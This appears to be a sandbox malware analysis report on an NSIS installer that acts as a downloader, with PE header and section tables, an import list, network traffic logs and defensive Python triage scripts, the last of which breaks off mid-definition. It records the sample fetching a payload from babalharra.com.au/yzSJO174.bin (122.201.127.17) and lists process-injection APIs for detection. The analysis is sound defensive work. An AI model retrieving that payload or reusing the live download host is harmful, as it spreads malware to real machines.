                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                          Instruction
                                          sub esp, 000002D4h
                                          push ebx
                                          push esi
                                          push edi
                                          push 00000020h
                                          pop edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+14h], ebx
                                          mov dword ptr [esp+10h], 0040A2E0h
                                          mov dword ptr [esp+1Ch], ebx
                                          call dword ptr [004080CCh]
                                          call dword ptr [004080D0h]
                                          and eax, BFFFFFFFh
                                          cmp ax, 00000006h
                                          mov dword ptr [007A8A6Ch], eax
                                          je 00007FA49121EED3h
                                          push ebx
                                          call 00007FA4912221C1h
                                          cmp eax, ebx
                                          je 00007FA49121EEC9h
                                          push 00000C00h
                                          call eax
                                          mov esi, 004082B0h
                                          push esi
                                          call 00007FA49122213Bh
                                          push esi
                                          call dword ptr [00408154h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], 00000000h
                                          jne 00007FA49121EEACh
                                          push 0000000Bh
                                          call 00007FA491222194h
                                          push 00000009h
                                          call 00007FA49122218Dh
                                          push 00000007h
                                          mov dword ptr [007A8A64h], eax
                                          call 00007FA491222181h
                                          cmp eax, ebx
                                          je 00007FA49121EED1h
                                          push 0000001Eh
                                          call eax
                                          test eax, eax
                                          je 00007FA49121EEC9h
                                          or byte ptr [007A8A6Fh], 00000040h
                                          push ebp
                                          call dword ptr [00408038h]
                                          push ebx
                                          call dword ptr [00408298h]
                                          mov dword ptr [007A8B38h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 000002B4h
                                          push eax
                                          push ebx
                                          push 0079FF08h
                                          call dword ptr [0040818Ch]
                                          push 0040A2C8h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0xb48 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x656c | 0x6600 | 12117ad2476c7a7912407af0dcfcb8a7 | False | 0.6737515318627451 | data | 6.47208759712619 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1398 | 0x1400 | e3e8d62e1d2308b175349eb9daa266c8 | False | 0.4494140625 | data | 5.137750894959169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb78 | 0x600 | 2020ca26e010546720fd467c5d087b57 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c7000 | 0xb48 | 0xc00 | 13d9a87cc14830e1f01c641a62386bbe | False | 0.4215494791666667 | data | 4.357284806500026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
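The header and section values above can be triaged mechanically. The script below is an added example, not part of the Joe Sandbox report or its tooling: it reimplements the 0..8 bits-per-byte entropy measure the report uses and applies three checks to the constants transcribed from this page. It computes how much of the 437'610-byte file lies outside every section (the NSIS overlay plus PE headers, since the report does not list raw file offsets), flags the gap between .data's virtual and raw size, and points out that DYNAMIC_BASE is set while relocations are stripped and the BASERELOC directory is empty. The thresholds (16x size ratio, entropy 7.5, half the file as overlay) are the example's own assumptions.

```python
import math
from dataclasses import dataclass
from typing import List, Optional

# Values transcribed from the header and section tables of this report.
# Raw file offsets are not listed, so the "outside sections" figure below
# counts the PE headers together with the overlay.
FILE_SIZE = 437_610
FILE_ENTROPY = 7.957710020525607
BASERELOC_DIR_SIZE = 0x0
FILE_CHARACTERISTICS = {"RELOCS_STRIPPED", "EXECUTABLE_IMAGE", "LINE_NUMS_STRIPPED",
                        "LOCAL_SYMS_STRIPPED", "32BIT_MACHINE"}
DLL_CHARACTERISTICS = {"DYNAMIC_BASE", "NX_COMPAT", "NO_SEH", "TERMINAL_SERVER_AWARE"}


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: Optional[float]  # None where the report prints "unknown"


SECTIONS = [
    Section(".text",  0x1000,   0x656c,   0x6600, 6.47208759712619),
    Section(".rdata", 0x8000,   0x1398,   0x1400, 5.137750894959169),
    Section(".data",  0xa000,   0x39eb78, 0x600,  None),
    Section(".ndata", 0x3a9000, 0x1e000,  0x0,    0.0),
    Section(".rsrc",  0x3c7000, 0xb48,    0xc00,  4.357284806500026),
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte on the 0.0..8.0 scale the report uses."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def bytes_outside_sections(file_size: int, sections: List[Section]) -> int:
    """File bytes not backed by any section: PE headers plus overlay."""
    return file_size - sum(s.raw_size for s in sections)


def triage(file_size: int, file_entropy: float, sections: List[Section],
           file_chars: set, dll_chars: set, basereloc_size: int) -> List[str]:
    findings = []
    outside = bytes_outside_sections(file_size, sections)
    if outside > file_size // 2:  # assumed threshold: more than half the file is overlay
        findings.append(
            f"overlay: {outside} of {file_size} bytes ({outside / file_size:.1%}) lie outside "
            f"every section; for an NSIS stub that is the compressed installer archive")
    if file_entropy >= 7.5:  # assumed threshold
        findings.append(
            f"entropy: whole-file entropy {file_entropy:.3f} is close to the 8.0 ceiling, "
            f"so compressed or encrypted content dominates the file")
    for s in sections:
        # Skip pure BSS (raw size 0); flag sections that are mostly zero-filled at load.
        if s.raw_size and s.virtual_size >= 16 * s.raw_size:
            findings.append(
                f"section {s.name}: virtual size 0x{s.virtual_size:x} is "
                f"{s.virtual_size // s.raw_size}x its raw size 0x{s.raw_size:x}; the "
                f"difference is zero-filled at load and usable as a writable scratch area")
    if "DYNAMIC_BASE" in dll_chars and ("RELOCS_STRIPPED" in file_chars or basereloc_size == 0):
        findings.append(
            "aslr: DYNAMIC_BASE is set but relocations are stripped and the BASERELOC "
            "directory is empty, so the loader cannot rebase the image; it maps at ImageBase")
    return findings


if __name__ == "__main__":
    for line in triage(FILE_SIZE, FILE_ENTROPY, SECTIONS,
                       FILE_CHARACTERISTICS, DLL_CHARACTERISTICS, BASERELOC_DIR_SIZE):
        print("-", line)
```

The overlay figure is the one to act on first: roughly nine tenths of this file is not mapped by any section, so static tooling that only looks at sections sees the generic NSIS stub and misses the archive that carries the actual installer script and plugin. The ASLR finding is a reminder that DYNAMIC_BASE alone says nothing about whether an image is actually relocatable.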
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c71c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894
RT_DIALOG | 0x3c74a8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3c75a8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3c76c8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3c7790 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3c77f0 | 0x14 | data | English | United States | 1.2
RT_MANIFEST | 0x3c7808 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
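This import table is the stock Nullsoft installer stub's, so most of it maps to installer features (ExitWindowsEx for the reboot prompt, the clipboard calls for copying the details log, the registry calls for uninstall entries) rather than to the loader stage. The script below is an added example, not report output: it maps the imported names to the capability buckets that sandbox signatures talk about and lists which process-injection primitives are absent from the static IAT. The import list is abridged to the names the mapping needs, and both the capability buckets and the injection-API list are the example's own choices.

```python
from typing import Dict, List, Set

# Subset of the import table transcribed from this report (DLL -> imported names).
IMPORTS: Dict[str, List[str]] = {
    "ADVAPI32.dll": ["RegCreateKeyExW", "RegSetValueExW", "RegDeleteValueW", "RegDeleteKeyW",
                     "AdjustTokenPrivileges", "LookupPrivilegeValueW", "OpenProcessToken"],
    "SHELL32.dll": ["SHFileOperationW", "ShellExecuteExW"],
    "USER32.dll": ["OpenClipboard", "SetClipboardData", "CloseClipboard", "EmptyClipboard",
                   "ExitWindowsEx", "FindWindowExW", "SendMessageTimeoutW"],
    "KERNEL32.dll": ["GetModuleHandleA", "GetModuleHandleW", "GetProcAddress", "LoadLibraryExW",
                     "CreateProcessW", "CreateThread", "WaitForSingleObject", "GetExitCodeProcess",
                     "CreateFileW", "WriteFile", "GetTempPathW", "GetTempFileNameW", "CopyFileW",
                     "MoveFileExW", "DeleteFileW", "GetTickCount", "Sleep", "GetVersion",
                     "GetDiskFreeSpaceW", "GetSystemDirectoryW", "GetWindowsDirectoryW"],
}

# Capability buckets (the example's own grouping, named after common sandbox signatures).
CAPABILITY_MAP: Dict[str, Set[str]] = {
    "dynamic API resolution": {"GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
                               "LoadLibraryExW", "LoadLibraryA", "LoadLibraryW"},
    "process creation": {"CreateProcessW", "CreateProcessA", "ShellExecuteExW", "ShellExecuteW"},
    "shutdown or reboot": {"ExitWindowsEx"},
    "privilege adjustment": {"OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "clipboard access": {"OpenClipboard", "SetClipboardData", "GetClipboardData",
                         "EmptyClipboard", "CloseClipboard"},
    "file drop to temp": {"GetTempPathW", "GetTempFileNameW", "CreateFileW", "WriteFile"},
    "registry write": {"RegCreateKeyExW", "RegSetValueExW", "RegDeleteKeyW", "RegDeleteValueW"},
    "execution timing": {"GetTickCount", "Sleep", "QueryPerformanceCounter"},
    "host survey": {"GetVersion", "GetDiskFreeSpaceW", "GetSystemDirectoryW", "GetWindowsDirectoryW"},
}

# Primitives a loader needs to inject into a suspended child; none is imported statically.
INJECTION_APIS: Set[str] = {"VirtualAlloc", "VirtualAllocEx", "VirtualProtect", "WriteProcessMemory",
                            "CreateRemoteThread", "NtUnmapViewOfSection", "SetThreadContext",
                            "ResumeThread", "NtAllocateVirtualMemory", "NtWriteVirtualMemory"}


def all_imports(imports: Dict[str, List[str]]) -> Set[str]:
    return {name for names in imports.values() for name in names}


def capabilities(imports: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """Buckets with at least one matching import, each listing the matching names."""
    present = all_imports(imports)
    return {cap: sorted(present & apis) for cap, apis in CAPABILITY_MAP.items() if present & apis}


def missing_injection_apis(imports: Dict[str, List[str]]) -> Set[str]:
    """Injection primitives that would have to be resolved at runtime (GetProcAddress)."""
    return INJECTION_APIS - all_imports(imports)


if __name__ == "__main__":
    for cap, names in capabilities(IMPORTS).items():
        print(f"{cap}: {', '.join(names)}")
    print("not in static IAT:", ", ".join(sorted(missing_injection_apis(IMPORTS))))
```

The useful negative result is the last line: the stub imports GetProcAddress and LoadLibraryExW but none of the allocation, write or thread-control calls that a suspended-process injection needs, so the injection capability the dynamic run shows has to come from code resolved at runtime (the NSIS plugin or the payload in the overlay), not from anything this table names.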
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T04:50:56.106860+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49974 | 122.201.127.17 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 04:50:54.599967003 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:54.600023031 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:54.600097895 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:54.610030890 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:54.610044003 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:55.593708992 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:55.593925953 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:55.650623083 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:55.650649071 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:55.650999069 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:55.651047945 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:55.655097008 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:55.699323893 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.106878042 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.106911898 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.107100010 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.107147932 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.107220888 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.314985037 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.314996958 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.315129042 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.315465927 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.315655947 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.316526890 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.316597939 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.317477942 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.317536116 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.624671936 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.624686956 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.624732018 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.624809027 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.624835968 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.624855995 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.624891996 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.624902964 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.624974012 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.625094891 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.625155926 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.625212908 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.625266075 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.625319958 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.625382900 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.732109070 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.732224941 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.732558012 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.732609034 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.733124971 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.733253956 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.734116077 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.734167099 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.735061884 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.735110998 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.735850096 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.735896111 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.736032009 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.736079931 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.736975908 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.737023115 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.737895966 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.737946033 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.738821030 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.738869905 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.739643097 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.739691019 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.740592957 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.740638971 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.741012096 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.741059065 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.822355032 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.822422028 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.822453022 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.822498083 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.940850019 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.940928936 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.940934896 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.940958977 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.940987110 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.941005945 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.941195011 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.941299915 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.941450119 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.941493988 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.941591024 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.941636086 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.941818953 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.941865921 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.942037106 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.942082882 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.942225933 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.942284107 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.942399979 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.942450047 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.942452908 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.942461967 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.942480087 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.942497015 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.942502022 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.942528963 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Jan 11, 2025 04:50:56.942536116 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:56.942560911 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:57.700553894 CET | 49974 | 443 | 192.168.2.7 | 122.201.127.17
Jan 11, 2025 04:50:57.700588942 CET | 443 | 49974 | 122.201.127.17 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 04:50:54.306457043 CET | 50764 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 04:50:54.592953920 CET | 53 | 50764 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 04:50:54.306457043 CET | 192.168.2.7 | 1.1.1.1 | 0x89c2 | Standard query (0) | babalharra.com.au | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 04:50:54.592953920 CET | 1.1.1.1 | 192.168.2.7 | 0x89c2 | No error (0) | babalharra.com.au | - | 122.201.127.17 | A (IP address) | IN (0x0001) | false
                                          • babalharra.com.au
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49974 | 122.201.127.17 | 443 | 7756 | C:\Users\user\Desktop\Ntwph4urc1.exe
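The HTTP exchange in this session (a GET for /yzSJO174.bin with a Firefox User-Agent, answered with a 290368-byte application/octet-stream body) is what the ETPRO "Common Downloader Header Pattern" alert fired on. The script below is an added example, not Joe Sandbox or Emerging Threats code, that parses the request and response headers as transcribed from the session data, pulls the indicators out, and applies one heuristic of the same flavour as that alert: a client claiming to be Firefox 131 that omits the Accept, Accept-Language, Accept-Encoding and Connection headers every current browser sends. The baseline header set is the example's own assumption about browser behaviour, not the ETPRO rule's logic, and the https scheme is inferred from the destination port 443 (the sandbox decrypted TLS, which is why the plaintext is visible at all).

```python
from typing import Dict, List, Tuple

# Constructed from the HTTP session data in this report: the request the sample
# sent and the response headers it received.
REQUEST = (
    "GET /yzSJO174.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0\r\n"
    "Host: babalharra.com.au\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sat, 11 Jan 2025 03:50:55 GMT\r\n"
    "Server: Apache\r\n"
    "Upgrade: h2,h2c\r\n"
    "Connection: Upgrade, close\r\n"
    "Last-Modified: Tue, 03 Dec 2024 05:37:53 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 290368\r\n"
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
)
# First 32 bytes of the response body, copied from the first "Data Raw" row.
BODY_HEAD = bytes.fromhex(
    "76 6f f3 7f 72 b1 9d b1 ec 9a 0c 04 d6 03 fa 78 "
    "d3 90 7a f2 1e 3b 83 6a 04 cf ff f8 18 4e 1b 13"
)

# Assumption: headers a real Firefox/Chrome sends on every fetch; a client that
# spoofs a browser UA but omits all of them is a hand-rolled HTTP stack.
BROWSER_BASELINE = ("accept", "accept-language", "accept-encoding", "connection")

MAGICS = {b"MZ": "pe", b"PK": "zip", b"\x7fELF": "elf", b"%PDF": "pdf"}


def parse_http(message: str) -> Tuple[str, Dict[str, str]]:
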